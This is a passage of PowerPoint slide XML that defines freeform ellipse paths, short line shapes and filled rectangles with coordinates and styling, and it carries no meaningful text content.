                  <a:pt x="85" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10301" name="Line 382"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2519362" y="7042150"/>
            <a:ext cx="1588" cy="92075"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10302" name="Line 383"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3254375" y="7042150"/>
            <a:ext cx="3175" cy="92075"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10303" name="Rectangle 384"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2519362" y="7042150"/>
            <a:ext cx="727075" cy="88900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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304" name="Rectangle 385"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2963862" y="7080250"/>
            <a:ext cx="0" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10305" name="Freeform 386"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2511425" y="6932613"/>
            <a:ext cx="735012" cy="174625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T1" fmla="*/ 0 h 77"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T22" fmla="*/ 0 w 325"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T91" fmla="*/ 0 h 7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5"/>
              <a:gd name="T139" fmla="*/ 0 h 77"/>
              <a:gd name="T140" fmla="*/ 325 w 325"/>
              <a:gd name="T141" fmla="*/ 77 h 7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5" h="77">
                <a:moveTo>
                  <a:pt x="163" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="147" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10306" name="Freeform 387"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2511425" y="6932613"/>
            <a:ext cx="735012" cy="174625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T1" fmla="*/ 0 h 77"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T22" fmla="*/ 0 w 325"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 325"/>
              <a:gd name="T91" fmla="*/ 0 h 7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5"/>
              <a:gd name="T139" fmla="*/ 0 h 77"/>
              <a:gd name="T140" fmla="*/ 325 w 325"/>
              <a:gd name="T141" fmla="*/ 77 h 7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5" h="77">
                <a:moveTo>
                  <a:pt x="163" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="147" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
